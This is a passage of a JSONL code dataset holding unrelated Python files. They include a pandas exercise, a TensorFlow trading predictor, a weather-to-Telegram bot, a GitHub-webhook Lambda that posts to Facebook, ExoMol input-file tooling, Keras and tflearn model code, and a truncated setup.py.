,fill=\"blue\")\n canvas.create_line(cos_pos(x1)[0],cos_pos(x1)[1], cos_pos(x1+0.1)[0],cos_pos(x1+0.1)[1] ,fill=\"red\")\n\ncanvas.pack()\ncanvas.mainloop()\n","sub_path":"my_math.py","file_name":"my_math.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"222045840","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[4]:\n\n\n# Part 2 Module5 Course Work\n\nimport pandas as pd\ngrades_dict = {'Wally': [87, 96, 70], 'Eva': [100, 87, 90], 'Sam': [94, 77, 90], 'Katie': [100, 81, 82], 'Bob': [83, 65, 85]}\n \n\n\n# In[5]:\n\n\ngrades = pd.DataFrame(grades_dict)\n\n\n# In[6]:\n\n\ngrades\n\n\n# In[11]:\n\n\ngrades = pd.DataFrame(grades_dict, index=['Test1', 'Test2', 'Test3'])\ngrades\n\n\n# In[10]:\n\n\ngrades['Eva']\n\n\n# In[12]:\n\n\ngrades.Sam\n\n\n# In[13]:\n\n\ngrades.loc['Test1']\n\n\n# In[14]:\n\n\ngrades.iloc[1]\n\n\n# In[15]:\n\n\ngrades.loc['Test1':'Test3']\n\n\n# In[16]:\n\n\ngrades.iloc[0:2]\n\n\n# In[18]:\n\n\ngrades.loc['Test1']\n\n\n# In[19]:\n\n\ngrades.iloc[0]\n\n\n# In[20]:\n\n\ngrades.iloc[1]\n\n\n# In[21]:\n\n\ngrades.at['Test2', 'Eva']\n\n\n# In[22]:\n\n\ngrades.iat[2,0]\n\n\n# In[23]:\n\n\ngrades.describe()\n\n\n# In[24]:\n\n\ngrades.mean()\n\n\n# In[26]:\n\n\ngrades.sort_index(ascending=False)\n\n\n# In[27]:\n\n\ngrades.sort_index(axis=1)\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"Module5_Part2.py","file_name":"Module5_Part2.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"327571402","text":"import sys\nimport ta\nimport pandas as pd\nfrom sklearn.preprocessing import minmax_scale\nimport numpy as np\nimport tensorflow as tf\n\nsess=tf.Session() \nsignature_key = tf.saved_model.signature_constants.DEFAULT_SERVING_SIGNATURE_DEF_KEY\ninput_key = 'x_input'\noutput_key = 'y_output'\n\nimport_path = './decider_python'\nmeta_graph_def = tf.saved_model.loader.load(sess, [tf.saved_model.tag_constants.SERVING], import_path)\nsignature = meta_graph_def.signature_def\n\nx_tensor_name = signature[signature_key].inputs[input_key].name\ny_tensor_name = signature[signature_key].outputs[output_key].name\n\nx = sess.graph.get_tensor_by_name(x_tensor_name)\ny = sess.graph.get_tensor_by_name(y_tensor_name)\n\n\nf = 
open(\"observations.txt\",\"w\")\n\n\nwhile True:\n\n args = input()\n arg_array = args.split(' ')\n\n timestamps = [ int(n) for n in arg_array[0].split(',') ]\n opens = [ float(n) for n in arg_array[1].split(',') ]\n high = [ float(n) for n in arg_array[2].split(',') ]\n low = [ float(n) for n in arg_array[3].split(',') ]\n close = [ float(n) for n in arg_array[4].split(',') ]\n volume = [ float(n) for n in arg_array[5].split(',') ]\n asset = float(arg_array[6])\n currency = float(arg_array[7])\n profit = float(arg_array[8])\n avgPrice = float(arg_array[9])\n\n\n\n\n df = pd.DataFrame({'Timestamp': timestamps, 'Open': opens, 'High': high, 'Low': low, 'Close': close, 'Volume': volume}).set_index('Timestamp')\n\n\n ta.add_all_ta_features(df, open=\"Open\", high=\"High\", low=\"Low\", close=\"Close\", volume=\"Volume\")\n\n\n columns = df.columns.values.tolist()\n columns.remove('momentum_kama') # was all nans\n\n\n signals = np.nan_to_num(df.loc[:, columns].to_numpy())\n\n signal_features = minmax_scale(signals)\n\n state = signal_features[-1]\n\n obs = np.append(state, [asset, currency, profit, avgPrice])\n\n f.write(str(timestamps[-1])+' '+np.array_str(obs[-5 : -1], precision=5, max_line_width=1200)+'\\n')\n\n pred = sess.run(y, {x: [obs]})\n # print(y)\n # pred = sess.run(y, {x: [state]})\n # print(np.sum(pred[0]))\n print('{d[0]:04.8f} {d[1]:04.8f} {d[2]:04.8f}'.format(d=pred[0])) #output\n\n # for c,v in zip(columns, df.iloc[-1,:]):\n # print(c, v)\n sys.stdout.flush()\n# end while loop","sub_path":"hello.py","file_name":"hello.py","file_ext":"py","file_size_in_byte":2237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"603098851","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nTrigger's ACL parser.\n\nThis library contains various modules that allow for parsing, manipulation,\nand management of network access control lists (ACLs). It will parse a complete\nACL and return an ACL object that can be easily translated to any supported\nvendor syntax.\n\"\"\"\n\n__author__ = 'Jathan McCollum'\n__author__ = 'Jathan McCollum, Mike Biancaniello, Mike Harding'\n__maintainer__ = 'Jathan McCollum'\n__email__ = 'jathanism@aol.com'\n__copyright__ = 'Copyright 2010-2012, AOL Inc.'\n__version__ = (0, 1)\n\nimport os\nfrom trigger.conf import settings\n\n__all__ = ['parser', 'acl_exists']\n\n# Parser\nfrom . import parser\nfrom parser import *\n__all__.extend(parser.__all__)\n\n# Functions\ndef acl_exists(name):\n return os.access(settings.FIREWALL_DIR + '/acl.' 
+ name, os.R_OK)\n","sub_path":"trigger/acl/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"368218323","text":"import time\n\nimport requests\nimport schedule\n\ndef send_forecast():\n latitude = '49.6618'\n longitude = '32.0477'\n\n response = requests.get('https://api.openweathermap.org/data/2.5/onecall?lat={}&lon={}&lang=uk&appid=${openweathermap-key}'.format(latitude, longitude))\n forecast = response.json()['daily'][0]['weather'][0]['description']\n\n if 'дощ' in forecast:\n text = \"Сьогодні буде \" + forecast + ' 😿'\n else:\n text = \"Сьогодні буде \" + forecast + ' 😺'\n requests.post('https://api.telegram.org/bot${telegram-bot-token}/sendMessage', {\"chat_id\": \"${chat-ID}\", \"text\": text})\n\nschedule.every().day.at(\"09:24\").do(send_forecast)\n\nsend_forecast()\n\nwhile True:\n schedule.run_pending()\n time.sleep(1)\n\n","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"432994605","text":"#!/usr/bin/env python\n\nimport re\nimport subprocess\nimport glob\n\n\ndef initiate_inp():\n\tflnms = glob.glob('../../original_inpfiles/*.inp')\n\tprint(flnms)\n\n\t#filename = \"inpt_files/14N32S.inp\"\n\n\tfor filename in flnms:\n\t\tsubprocess.call([\"chmod\", \"666\", filename])\n\n\t\twith open(filename, 'r') as file:\n\t\t\tmolecule = filename.split('/')[-1].split('.')[0]\n\t\t\tprint(molecule)\n\n\t\t\ttxt = str(file.read())\n\t\t\n\t\t\tx = re.split('intensity',txt, flags=re.I)[1]\n\t\t\tx = re.split('end', x, flags= re.I)[0]\n\t\t\t#x = x[0]\n\t\t\t#print(x)\n\t\t\n\t# \t\ty = re.search('intensity.*end', txt, re.I| re.S).group(0)\n\n\t\n\t\t\tcommon = f'''\\n absorption\n thresh_intes 1e-30\n thresh_coeff 1e-30\n thresh_dipole 1e-30\n temperature 1000.0\n J, 0.5,20.5\n zpe 0.0\n linelist {molecule}_J20_1000K_e-0\\n'''\n\n\t\n\t\t#Keep setting that are unique? 
to molecule\n\t\n\t\t\tsrch = re.search('.*nspin.*\\n', txt)\n\t\t\tif srch is not None:\n\t\t\t\tcommon = common + srch.group()\n\t\t\n\t\t\tsrch = re.search('.*gns.*\\n', txt)\n\t\t\tif srch is not None:\n\t\t\t\tcommon = common + srch.group()\n\t\t\n\t\t\tsrch = re.search('.*freq-window.*\\n', txt)\n\t\t\tif srch is not None:\n\t\t\t\tcommon = common + srch.group()\n\t\t\n\t\t\tsrch = re.search('.*energy low.*\\n', txt)\n\t\t\tif srch is not None:\n\t\t\t\tcommon = common + srch.group()\n\t\t\n\t\t\tsrch = re.search('.*selection.*\\n', txt)\n\t\t\tif srch is not None:\n\t\t\t\tcommon = common + srch.group()\n\t\n\t\t\t#print(common)\n\n\n\t# \tGet rid of lande and qstat in the intensity section \n\t# \t\tsrch = re.search('lande.*\\n\\s*', txt)\n\t# \t\tprint(srch)\n\t# \t\tif srch is not None:\n\t# \t\t\tprint(srch.group())\n\t# \t\t\tupx = re.sub(srch.group(), ' ', upx)\n\t# \t\t\t\t\n\t# \t\tsrch = re.search('qstat.*\\n\\s*', txt)\n\t# \t\tprint(srch)\n\t# \t\tif srch is not None:\n\t# \t\t\tprint(srch.group())\n\t# \t\t\tupx = re.sub(srch.group(), ' ', upx)\n\t# \t\tprint(x)\n\t# \t\tprint(upx)\n\t# \t\ttxt = re.sub(x, upx, txt)\n\n\t\t#update \n\n\t\t\ttxt = txt.replace(x, common)\n\t\t\t#print(txt)\n\t\n\t\twith open(f'../../run/{molecule}_e-0.inp', 'w') as file:\n\t\t\tfile.write(txt)\n\t\t\n\t\twith open(f'../../run/{molecule}_e-0.inp', 'r') as file:\n\t\t\ttxt = str(file.read())\n\t\t\tdeltam = 1+ 10**(-4)\n\t\t\n\t\t\n\t\t\tmolmass = txt.split('masses')[1].split('\\n')[0]\n\t\t\tprint(molmass)\n\t\t\tmass1 = float(molmass.split()[0])\n\t\t\tmass2 = float(molmass.split()[1])\n\t\t\n\t\t\tmass1_up = mass1*deltam\n\t\t\tmass2_up = mass2*deltam\n\t\t\tprint(f' {mass1_up} {mass2_up}')\n\t\t\t\n\t\t\tsrch = re.search('linelist.*\\n\\s*', txt)\n\t\t\tif srch is not None:\n\t\t\t\tprint(srch.group())\n\t\t\t\ttxt = re.sub(srch.group(), f'linelist {molecule}_J20_1000K_e-4 \\n ', txt)\n\t\t\tprint(re.search('linelist.*\\n\\s*', txt).group())\t\n\t\t\t\t\n\t\t\t\n\t\t\ttxt = txt.replace(molmass, f' {mass1_up} {mass2_up}')\n\t\t\n\t\twith open(f'../../run/{molecule}_e-4.inp', 'w') as file:\n\t\t\tfile.write(txt)\n\n\ninitiate_inp()\n\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n","sub_path":"Exomol_db/func_reg_init.py","file_name":"func_reg_init.py","file_ext":"py","file_size_in_byte":2699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"311054848","text":"import hashlib\nimport hmac\nimport json\nimport os\n\nfrom botocore.vendored import requests\n\n\ndef lambda_handler(event, context):\n post_headers = {\n \"Authorization\": \"Bearer {}\".format(os.environ['FB_API_TOKEN']),\n }\n url = \"https://graph.facebook.com/{}/feed\".format(\n os.environ['FB_GROUP_ID'],\n )\n\n headers = event[\"headers\"]\n body = event[\"body\"]\n\n github_event = headers.get(\"X-GitHub-Event\")\n\n computed_signature = hmac.new(\n bytes(os.environ[\"GITHUB_WEBHOOK_SECRET\"], \"UTF-8\"),\n bytes(body, \"UTF-8\"),\n hashlib.sha1\n ).hexdigest()\n\n sha, signature = headers.get(\"X-Hub-Signature\").split('=')\n\n if computed_signature != signature:\n print(\"Invalid signature: \", computed_signature, signature)\n return {\"statusCode\": 400, \"body\": \"Invalid signature\"}\n\n handled_events = {'pull_request', 'status'}\n\n if github_event not in handled_events:\n return {\"statusCode\": 200, \"body\": \"Unsupported event\"}\n\n body = json.loads(body)\n\n if github_event == 'pull_request':\n allowed_actions = {\"opened\", \"closed\", \"reopened\"}\n action = 
body.get(\"action\")\n if action not in allowed_actions:\n return {\"statusCode\": 200,\n \"body\": \"Unsupported pull request action\"}\n\n if action == \"closed\" and body.get(\"merged\"):\n action = \"merged\"\n\n pr_data = body.get(\"pull_request\")\n repo = body.get(\"repository\")\n sender = body.get(\"sender\")\n msg = \"[{}] {} **{}** a pull request\\n[**# {} {}**]({})\\n{}\\n\".format(\n repo.get(\"full_name\"),\n sender.get(\"login\"),\n action,\n body.get(\"number\"),\n pr_data.get(\"title\"),\n pr_data.get(\"html_url\"),\n pr_data.get(\"body\"),\n )\n\n if github_event == 'status':\n allowed_states = {\"failure\", \"error\"}\n state = body.get(\"state\")\n if state not in allowed_states:\n return {\"statusCode\": 200,\n \"body\": \"Unsupported status action\"}\n repo = body.get(\"name\")\n ci_project = body.get(\"context\").split(\":\")[-1].strip()\n\n ci_url = body.get(\"target_url\")\n ci_build_number = ci_url.split(\"/\")[-1].split(\"?\")[0]\n commit_data = body.get(\"commit\")\n author_data = commit_data.get(\"author\")\n author = author_data.get(\"login\")\n\n commit_commit_data = commit_data.get(\"commit\")\n commit_message = commit_commit_data.get(\"message\").replace(\"\\n\", \" \")\n commit_url = commit_data.get(\"html_url\")\n commit_number = commit_url.split(\"/\")[-1][0:7]\n branch_data = body.get(\"branches\")[0]\n branch_name = branch_data.get(\"name\")\n retry_url = \"https://circleci.com/actions/retry/github/{}/{}\".format(repo, ci_build_number)\n msg = \"[{}] **{}**: {}'s circleci build # [{}]({}) ({})\\n\\nBranch [{}/{}]({}):\\n>{}\\n\\nActions: [Rebuild]({})\".format(\n repo,\n state.upper(),\n author,\n ci_build_number,\n ci_url,\n ci_project,\n branch_name,\n commit_number,\n commit_url,\n commit_message,\n retry_url,\n )\n\n data = {\n 'formatting': 'MARKDOWN',\n 'message': msg,\n }\n requests.post(url, headers=post_headers, data=data)\n print(\"Posted to group!\")\n return {\"statusCode\": 200, \"body\": \"Victory!\"}\n","sub_path":"handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":3441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"558478872","text":"import sys\nfrom datetime import datetime\n\nimport keras.backend as k\nimport tensorflow as tf\n\nfrom utils import factory\nfrom utils.args import get_args\nfrom utils.config import process_config\nfrom utils.dirs import create_dirs\nfrom utils.logging import logger\n\n\ndef main():\n ##########################################################\n # TensorFlow configuration\n tf_config = tf.ConfigProto()\n tf_config.gpu_options.allow_growth = True\n k.tensorflow_backend.set_session(tf.Session(config=tf_config))\n ##########################################################\n\n # capture the config path from the run arguments\n # then process the json configuration fill\n try:\n args = get_args()\n config = process_config(args.config)\n\n # create the experiments dirs\n create_dirs([config.callbacks.tensorboard_log_dir, config.callbacks.checkpoint_dir])\n\n logger('Creating data generators ...'.format(datetime.now()))\n data_loader = {'train': factory.create(\"data_loader.\"+config.data_loader.name)(config, subset='train', shuffle=True),\n 'eval': factory.create(\"data_loader.\" + config.data_loader.name)(config, subset='eval')}\n\n logger('Creating the model ...'.format(datetime.now()))\n model = factory.create(\"models.\"+config.model.name)(config)\n\n logger('Creating the trainer ...'.format(datetime.now()))\n if 
config.model.num_gpus > 1:\n trainer = factory.create(\"trainers.\"+config.trainer.name)(model.parallel_model, data_loader, config)\n else:\n trainer = factory.create(\"trainers.\"+config.trainer.name)(model.model, data_loader, config)\n\n logger('Starting model training ...'.format(datetime.now()))\n trainer.train()\n \n logger('Training has finished!'.format(datetime.now()))\n\n except Exception as e:\n logger(e)\n sys.exit(1)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"train_model.py","file_name":"train_model.py","file_ext":"py","file_size_in_byte":1940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"430034480","text":"try:\n ## the normal way to import from rootplot\n from rootplot.tree2hists import RootTree, Plot\nexcept ImportError:\n ## special import for CMSSW installations of rootplot\n from PhysicsTools.PythonAnalysis.rootplot.tree2hists import RootTree, Plot\nfrom array import array # to allow making Float_t arrays for ROOT hists\nfrom math import pi\nfrom ROOT import TH1D, TH2F # import other kinds of hists as neeeded\n\ndef lp(treename,filename,target):\n\tspecific_plots = []\n\tif 'El' in treename:\n\t\tisorangemax=0.15\n\telif 'Mu' in treename:\n\t\tisorangemax=0.15\n\t\tspecific_plots = [\n\t\tPlot(\"Muonparam[5]\" , TH1D(\"leptonNVHits\" , \";Lepton Number of valid hits ;entries/bin\", 52, -0.5, 50.5)),\n\t\tPlot(\"Muonparam[8]\" , TH1D(\"leptonNVPixelHits\" , \";Lepton Number of valid pixel hits ;entries/bin\", 17, -0.5, 15.5)),\n\t\tPlot(\"Muonparam[3]\" , TH1D(\"leptonchi2\" , \";Lepton #chi^{2} ;entries/bin\", 15, 0., 15.)),\n\t\tPlot(\"Muonparam[4]\" , TH1D(\"leptonTrackerLayersWithMeasurement\" , \";Lepton # tracker layers with measurement ;entries/bin\", 22, -0.5, 20.5)),\n\t\tPlot(\"Muonparam[9]\" , TH1D(\"leptonMatchedStations\" , \";Lepton # of matched tracker stations ;entries/bin\", 11, -0.5, 10.5)),\n\t\tPlot(\"Muonparam[6]\" , TH1D(\"leptond0\" , \";Lepton d0 [cm] ;entries/bin\", 100, -0.2, 0.2)),\n\t\tPlot(\"Muonparam[7]\" , TH1D(\"leptonz0\" , \";Lepton z0 [cm] ;entries/bin\", 100, -2., 2.))\n\t\t]\n\telse:\n\t\traise NameError('Tree name %s is not recognized'%treename)\n\n\tfrom listofplots_cards import targetvar\n\tbdtplot = targetvar(target)\n\t#if 'Data' in filename: bdtplot = Plot(\"-666.\" , TH1D(\"bdt\" , \";BDT;entries/bin\", 32, -0.6, 1.))\n\t#if 'Data' in filename: bdtplot = Plot(\"-666.\" , TH1D(\"bdt\" , \";BDT;entries/bin\", 30, -1., 0.5))\n\t#if 'Data' in filename: bdtplot = Plot(\"-666.\" , TH1D(\"bdt\" , \";BDT;entries/bin\", 50, -1., 1.))\n\t#if 'Data' in filename: bdtplot = Plot(\"BDT9and10jetsplit.BDT9and10jetsplit\" , TH1D(\"bdt\" , \";BDT;entries/bin\", 50, -1., 1.))\n\t#if 'Data' in filename and 'BDT' in target: bdtplot = Plot(\"BDT9and10jetsplitNoNjw.BDT9and10jetsplitNoNjw>0.6?-10.:BDT9and10jetsplitNoNjw.BDT9and10jetsplitNoNjw\" , TH1D(\"bdt\" , \";BDT;entries/bin\", 50, -1., 1.))\n\t#if 'Data' in filename and 'BDT' in target: bdtplot = Plot(\"BDT9and10jetsplitNoNjw.BDT9and10jetsplitNoNjw\" , TH1D(\"bdt\" , \";BDT;entries/bin\", 50, -1., 1.))\n\t# if 'Data' in filename and 'BDT' in target: bdtplot = Plot(\"BDT1\" , TH1D(\"bdt\" , \";BDT;entries/bin\", 50, -1., 1.))\n\tif 'Data' in filename and 'BDT' in target: bdtplot = Plot(\"BDT1\" , TH1D(\"bdt\" , \";BDT;entries/bin\", 20, -1., 1.))\n\t#if 'Data' in filename and 'BDT' in target: bdtplot = Plot(\"BDT9and10jetsplitNoNjw.BDT9and10jetsplitNoNjw\" , TH1D(\"bdt\" , \";BDT;entries/bin\", 25, -1., 1.))\n\t#if 'Data' in 
filename and 'BDT' in target: bdtplot = Plot(\"BDT9and10jetsplitNoNjw.BDT9and10jetsplitNoNjw\" , TH1D(\"bdt\" , \";BDT;entries/bin\", 10, -1., 1.))\n\t#if 'Data' in filename: bdtplot = Plot(\"BDT\" , TH1D(\"bdt\" , \";BDT;entries/bin\", 32, -0.6, 1.))\n\t#else: bdtplot = Plot(\"BDT\" , TH1D(\"bdt\" , \";BDT;entries/bin\", 32, -0.6, 1.))\n\t#else: bdtplot = Plot(\"BDT\" , TH1D(\"bdt\" , \";BDT;entries/bin\", 30, -1.0, 0.5))\n\t#else: bdtplot = Plot(\"BDTninejet.MVAoutput\" , TH1D(\"bdt\" , \";BDT;entries/bin\", 32, -0.6, 1.))\n\t#else: bdtplot = Plot(\"Gradninejet.MVAoutput\" , TH1D(\"bdt\" , \";BDT;entries/bin\", 10, -5., 5.))\n\t#else: bdtplot = Plot(\"BDTjetsplit.MVAoutput\" , TH1D(\"bdt\" , \";BDT;entries/bin\", 30, -1., 0.5))\n\t#else: bdtplot = Plot(\"BDTjetsplit.BDTjetsplit\" , TH1D(\"bdt\" , \";BDT;entries/bin\", 50, -1., 1.))\n\t#else: bdtplot = Plot(\"BDTjetsplit.BDTjetsplit\" , TH1D(\"bdt\" , \";BDT;entries/bin\", 30, -1., 0.5))\n\t#else: bdtplot = Plot(\"BDT9and10jetsplit.BDT9and10jetsplit\" , TH1D(\"bdt\" , \";BDT;entries/bin\", 30, -1., 0.5))\n\t##else: bdtplot = Plot(\"BDT9and10jetsplit.BDT9and10jetsplit\" , TH1D(\"bdt\" , \";BDT;entries/bin\", 50, -1., 1.))\n\tplots_list = [bdtplot,\n\tPlot(\"multitopness\" , TH1D(\"multitopness\" , \"; Topness;entries/bin\", 10, -0.7, 0.35)),\n\tPlot(\"jetvec[][0]\" , TH1D(\"jetpt\" , \";jet p_{T} (GeV);entries/bin\", 10, 30., 1530.)),\n\tPlot(\"jetvec[][1]\" , TH1D(\"jeteta\" , \";jet #eta;entries/bin\", 10, -2.5, 2.5)),\n\tPlot(\"jetvec[][2]\" , TH1D(\"jetphi\" , \";jet #phi;entries/bin\", 10, -pi, pi)),\n\tPlot(\"jetvec[][3]\" , TH1D(\"jetcsv\" , \";jet CSVv2;entries/bin\", 10, 0., 1.)),\n\tPlot(\"1stjetpt\" , TH1D(\"1stjetpt\" , \";1st jet p_{T} (GeV);entries/bin\", 10, 30., 1530.)),\n\tPlot(\"2ndjetpt\" , TH1D(\"2ndjetpt\" , \";2nd jet p_{T} (GeV);entries/bin\", 10, 30., 1030.)),\n\tPlot(\"5thjetpt\" , TH1D(\"5thjetpt\" , \";5th jet p_{T} (GeV);entries/bin\", 10, 30., 230.)),\n\tPlot(\"6thjetpt\" , TH1D(\"6thjetpt\" , \";6th jet p_{T} (GeV);entries/bin\", 10, 30., 230.)),\n\tPlot(\"LeptonPt\" , TH1D(\"leptonpt\" , \";Lepton p_{T} (GeV);entries/bin\", 10, 0., 800.)),\n\tPlot(\"LeptonEta\" , TH1D(\"leptoneta\" , \";Lepton #eta ;entries/bin\", 10, -2.5, 2.5)),\n\tPlot(\"leptonphi\" , TH1D(\"leptonphi\" , \";Lepton #phi ;entries/bin\", 10, -pi, pi)),\n\tPlot(\"leptonIso\" , TH1D(\"leptonIso\" , \";Lepton Isolation ;entries/bin\", 10, 0., isorangemax)),\n\tPlot(\"nLtags\" , TH1D(\"nltags\" , \";Number of loose tags;entries/bin\", 8, -0.5, 7.5)),\n\tPlot(\"nMtags\" , TH1D(\"nmtags\" , \";Number of medium tags;entries/bin\", 4, 1.5, 5.5)),\n\tPlot(\"nTtags\" , TH1D(\"nttags\" , \";Number of tight tags;entries/bin\", 5, -0.5, 4.5)),\n\tPlot(\"nJets\" , TH1D(\"njets\" , \";Number of jets;entries/bin\", 4, 6.5, 10.5)),\n\tPlot(\"HT\" , TH1D(\"ht\" , \";HT (GeV);entries/bin\", 10, 150., 2150.)),\n\tPlot(\"HTb\" , TH1D(\"HTB\" , \";HTB (GeV);entries/bin\", 10, 0., 1000.)),\n\tPlot(\"HTH\" , TH1D(\"HTH\" , \";HTH;entries/bin\", 10, 0.1, 1.1)),\n\tPlot(\"HTRat\" , TH1D(\"HTRat\" , \";HTRat;entries/bin\", 10, 0., 0.45)),\n\tPlot(\"HTX\" , TH1D(\"HTX\" , \";HTX (GeV);entries/bin\", 10, 0., 3000.)),\n\tPlot(\"SumJetMassX\" , TH1D(\"SumJetMassX\" , \";Sum jet M (GeV);entries/bin\", 10, 0., 3500.)),\n\tPlot(\"PU\" , TH1D(\"pu\" , \";Number of prim. 
v.;entries/bin\", 10, -0.5, 54.5)),\n\tPlot(\"NjetsW\" , TH1D(\"njetsw\" , \";p_{T} weighted jet multiplicity;entries/bin\", 10, -0.5, 15.5)),\n\t#Plot(\"SFlepton\" , TH1D(\"SFlepton\" , \";Event SF due to leptons;entries/bin\", 100, 0., 2.5)),\n\t#Plot(\"SFbtag\" , TH1D(\"SFbtag\" , \";Event SF due to btag;entries/bin\", 100, 0., 5.)),\n\t#Plot(\"SFbtagUp\" , TH1D(\"SFbtagUp\" , \";Event SF due to btag (up variation);entries/bin\", 100, 0., 2.5)),\n\t#Plot(\"SFbtagDown\" , TH1D(\"SFbtagDown\" , \";Event SF due to btag (down variation);entries/bin\", 100, 0., 2.5)),\n\t#Plot(\"SFPU\" , TH1D(\"SFPU\" , \";Event SF due to PU;entries/bin\", 100, 0., 5.)),\n\tPlot(\"met\" , TH1D(\"met\" , \";MET (GeV);entries/bin\", 10, 0., 400.)),\n\t#Plot(\"csvJetcsv1\" , TH1D(\"csvJetcsv1\" , \";CSV1;entries/bin\", 10, 0., 1.)),\n\t#Plot(\"csvJetcsv2\" , TH1D(\"csvJetcsv2\" , \";CSV2;entries/bin\", 10, 0., 1.)),\n\tPlot(\"csvJetcsv3\" , TH1D(\"csvJetcsv3\" , \";CSV3;entries/bin\", 10, 0., 1.)),\n\tPlot(\"csvJetcsv4\" , TH1D(\"csvJetcsv4\" , \";CSV4;entries/bin\", 10, 0., 1.)),\n\t#Plot(\"csvJetpt1\" , TH1D(\"csvJetpt1\" , \";CSV1;entries/bin\", 10, 0., 1.)),\n\t#Plot(\"csvJetpt2\" , TH1D(\"csvJetpt2\" , \";CSV2;entries/bin\", 10, 0., 1.)),\n\t#Plot(\"csvJetpt3\" , TH1D(\"csvJetpt3\" , \";CSV3;entries/bin\", 10, 0., 1.)),\n\t#Plot(\"csvJetpt4\" , TH1D(\"csvJetpt4\" , \";CSV4;entries/bin\", 10, 0., 1.))\n\t]\n\tplots_list += specific_plots\n\treturn plots_list\n","sub_path":"result/listofplots.py","file_name":"listofplots.py","file_ext":"py","file_size_in_byte":7968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"630365078","text":"# -*- coding: utf-8 -*-\n\nimport numpy as np\n\nimport tflearn\nfrom tflearn.layers.conv import conv_2d, max_pool_2d\nfrom tflearn.layers.core import input_data, dropout, fully_connected\nfrom tflearn.layers.estimator import regression\nfrom tflearn.optimizers import SGD\nfrom tflearn.optimizers import RMSProp\n\nfrom config import learningRate\n\ndef createModel(nbClasses,imageSize, sliceHeight):\n\tprint(\"[+] Creating model...\")\n\tconvnet = input_data(shape=[None, imageSize, sliceHeight, 1], name='input')\n\n\n\tconvnet = conv_2d(convnet, 32, 2, activation='elu', weights_init=\"Xavier\")\n\tconvnet = max_pool_2d(convnet, 2)\n\n\tconvnet = conv_2d(convnet, 64, 2, activation='elu', weights_init=\"Xavier\")\n\tconvnet = max_pool_2d(convnet, 2)\n\n\tconvnet = conv_2d(convnet, 128, 2, activation='elu', weights_init=\"Xavier\")\n\tconvnet = max_pool_2d(convnet, 2)\n\n\tconvnet = conv_2d(convnet, 256, 2, activation='elu', weights_init=\"Xavier\")\n\tconvnet = max_pool_2d(convnet, 2)\n\n\tconvnet = conv_2d(convnet, 512, 2, activation='elu', weights_init=\"Xavier\")\n\tconvnet = max_pool_2d(convnet, 2)\n\n\tconvnet = conv_2d(convnet, 1024, 2, activation='elu', weights_init=\"Xavier\")\n\tconvnet = max_pool_2d(convnet, 2)\n\n\tconvnet = fully_connected(convnet, 2048, activation='elu')\n\tconvnet = dropout(convnet, 0.5)\n\n\tconvnet = fully_connected(convnet, nbClasses, activation='softmax')\n\trmsprop = RMSProp(learning_rate=learningRate, decay=0.999)\n#\tsgd = SGD(learning_rate=learningRate, lr_decay=0.96, decay_step=100)\n\tconvnet = regression(convnet, optimizer='rmsprop', loss='categorical_crossentropy')\n#\tconvnet = regression(convnet, optimizer='sgd', loss='categorical_crossentropy')\n\n\tmodel = tflearn.DNN(convnet)\n\tprint(\" Model created! 
✅\")\n\treturn model\n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"158968923","text":"class Kettle(object):\n\n power_source = \"electricity\" \\\n \"\"\n def __init__(self, make, price):\n self.make = make\n self.price = price\n self.on = False\n\n def switch_on(self):\n self.on = True\n\nkenwood = Kettle(\"kenwood\", 13.55)\nhamilton = Kettle(\"hamilton\", 19.99)\nprint(\"Kettles: {0.make} = {0.price} and {1.make} = {1.price}\".format(kenwood, hamilton))\n\n\nprint(hamilton.on)\nhamilton.switch_on()\nprint(hamilton.on)\n\nKettle.switch_on(kenwood)\nprint(kenwood.on)\n\nkenwood.power = 1.5\nprint(kenwood.power)\n\nprint (\"{} {} {}\".format(Kettle.power_source, kenwood.power_source, hamilton.power_source))","sub_path":"OOPS/oop.py","file_name":"oop.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"234866516","text":"# !/usr/bin/env python3\r\n\r\nimport pathlib\r\nfrom setuptools import setup\r\n\r\nwith open(\"README.md\", \"r\") as fh:\r\n long_description = fh.read()\r\n\r\nwith open('requirements.txt') as f:\r\n required = f.read().splitlines()\r\n\r\nwith open(\"nse_install/__init__.py\") as ver:\r\n init = ver.read()\r\n\r\nversion = init.split(\"=\")[-1].strip().strip(\"\\\"\")\r\n\r\n\r\n# test dependencies\r\ntest_deps = [\r\n 'pytest',\r\n 'pytest-cov',\r\n]\r\nextras = {\r\n 'test': test_deps,\r\n}\r\n\r\n# This call to setup() does all the work\r\nsetup(\r\n name=\"nse_install\",\r\n version=version,\r\n description=\"Install and update external NSE script for nmap\",\r\n long_description=long_description,\r\n long_description_content_type=\"text/markdown\",\r\n url=\"https://github.com/remiflavien1/nse-install\",\r\n author=\"shadawck\",\r\n author_email=\"hug211mire@gmail.com\",\r\n license=\"MIT\",\r\n classifiers=[\r\n \"License :: OSI Approved :: MIT License\",\r\n \"Programming Language :: Python :: 3\",\r\n \"Programming Language :: Python :: 